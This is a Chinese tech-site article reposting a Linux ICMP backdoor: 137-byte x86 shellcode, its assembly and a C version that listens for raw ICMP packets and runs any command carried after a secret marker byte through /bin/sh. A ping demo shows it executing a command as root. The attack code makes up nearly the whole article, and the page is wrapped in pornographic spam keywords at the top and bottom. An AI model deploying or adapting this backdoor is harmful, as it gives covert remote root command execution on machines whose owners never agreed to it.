成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux ICMP后門代碼

網絡 網絡管理
下面我們來對Linux Icmp后門的相關內容進行一下介紹。文中介紹了具體的代碼,希望對大家有所幫助。

在不少協議的應用都存在著一些后門。例如我們今天將要介紹的Linux ICMP的后門。那么下面我們就來詳細看一下關于137字節的Linux遠程ICMP后門的具體內容。使用Ping控制程序:

  /*
  x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
  
  [example]
  
  main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
  Size of shellcode = 137
  
  main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
  PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
  34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
  main:/home/gloomy/security/shellcode/linux/icmp# cat out
  uid=0(root) gid=0(root) groups=0(root)
  main:/home/gloomy/security/shellcode/linux/icmp#
  
  */
  
  #include <stdio.h>
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  
  #define SECRET_CHAR "\x99"
  
  char shell[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
  "\x43\x41\x51\xb1\x03\x51\x49\x51"
  "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
  "\xcd\x80\x31\xdb\x39\xc3\x75\x55"
  "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
  "\xff\x54\x54\x53\x50\x55\x52\x89"
  "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
  "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
  "\xb0\x25\x01\xc5\xb0" SECRET_CHAR
  "\x32\x45\xff\x75\xd5\xb0\x02\xcd"
  "\x80\x31\xdb\x39\xc3\x74\x25\xeb"
  "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
  "\x06\xcd\x80\x5b\x89\xd9\x88\x43"
  "\x07\x80\xc1\x08\x50\x55\x51\x53"
  "\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
  "\xff"
  "/bin/sh -c";
  
  void asm_code() {
  __asm("
  xorl %eax,%eax
  xorl %ebx,%ebx
  xorl %ecx,%ecx
  movb $0x66,%al
  incl %ebx
  incl %ecx
  push %ecx
  movb $0x3,%cl
  push %ecx
  decl %ecx
  push %ecx
  movl %esp,%ecx
  int $0x80 /* socket(); */
  movl %eax,%edx
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  jne exit
  
  endlessloop:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x10,%al
  push %eax
  movb $0xff,%al
  push %esp
  push %esp
  push %ebx
  push %eax
  push %ebp
  push %edx
  movl %esp,%ecx
  movb $0x66,%al
  movb $0x0c,%bl
  int $0x80 /* recvfrom(); */
  
  movl %ebp,%ecx
  addl %eax,%ecx
  xorl %eax,%eax
  movb %al,-2(%ecx)
  movb $0x25,%al
  addl %eax,%ebp
  movb $0x99,%al /* SECRET_CHAR */
  xorb -1(%ebp),%al
  jnz endlessloop
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  je stack
  jmp endlessloop
  execve:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x2,%bl
  movb $0x6,%al
  int $0x80 /* close(); */
  
  pop %ebx
  movl %ebx,%ecx
  movb %al,0x7(%ebx)
  addb $0x8,%cl
  push %eax
  push %ebp
  push %ecx
  push %ebx
  movl %esp,%ecx
  cdq
  movb $0xb,%al
  int $0x80 /* execve(); */
  exit:
  xorl %eax,%eax
  incl %eax
  int $0x80 /* exit(); */
  stack:
  call execve
  .string \"/bin/sh -c\"
  
  ");
  }
  
  void c_code() {
  int fd;
  int nb = 0;
  struct sockaddr_in them;
  int them_size = sizeof(struct sockaddr);
  char buf[256];
  char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
  
  fd = socket(2,3,1);
  if (fork() > 0) exit(0);
  while (1) {
  while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
  buf[nb-1] = 0;
  if (buf[36] == (char)SECRET_CHAR)
  if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
  }
  }
  
  int main(int c,char *v[]) {
  void (*i)();
  i = (void (*)())shell;
  fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
  i();
  return 0;

那么,具體的Linux ICMP后門查看方法我們就呈現出來了。

責任編輯:佟健 來源: csdn.net
相關推薦

2010-08-26 11:15:47

LinuxICMP后門

2010-08-31 10:00:55

LinuxICMP

2010-03-10 10:24:16

Linux ssh后門

2010-07-30 16:10:57

ICMPping

2010-08-02 15:21:06

DelphiICMP

2010-08-02 14:29:46

LinuxPingICMP

2010-07-13 10:38:54

2014-03-06 17:52:25

2016-02-25 11:02:11

2010-01-15 10:32:40

2024-04-03 14:28:12

2010-01-14 20:57:59

2010-09-13 14:47:58

2010-09-13 15:06:36

2010-09-13 14:57:29

2013-04-12 11:07:01

2010-09-13 15:14:03

2021-05-06 14:46:18

LinuxIcmpudp

2010-08-02 16:43:46

ICMP協議

2010-09-13 15:26:34

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91高清视频在线观看 | 365夜爽爽欧美性午夜免费视频 | 精品国产乱码久久久久久老虎 | 亚洲成人免费 | 欧美在线观看一区二区 | 狠狠操天天操 | 欧美精品一区免费 | 在线视频成人 | 毛片毛片毛片毛片毛片 | 精品免费 | 日本免费一区二区三区四区 | 久久成人高清视频 | 日本在线视频一区二区 | 天天噜天天干 | 午夜av成人| 毛片高清 | 精品国产一区二区三区久久久四川 | 日韩二| 国产高清视频 | 亚洲欧美综合 | 久久久久久久电影 | 亚洲精品成人av久久 | 日韩国产免费 | 国产一区二区三区四区五区加勒比 | 午夜视频一区二区 | 国产一区二区精品在线观看 | 国产日韩欧美精品一区二区 | 国产91在线 | 亚洲 | 日韩精品视频一区二区三区 | 婷婷久久一区 | 亚洲国产成人精品久久久国产成人一区 | 欧美日韩精品一区二区三区四区 | 亚洲国产网址 | 99精品视频免费观看 | 亚洲精品视频在线看 | 操久久 | 在线观看视频中文字幕 | 天堂素人约啪 | 久久精品日产第一区二区三区 | 97国产精品| 日韩精品1区2区3区 国产精品国产成人国产三级 |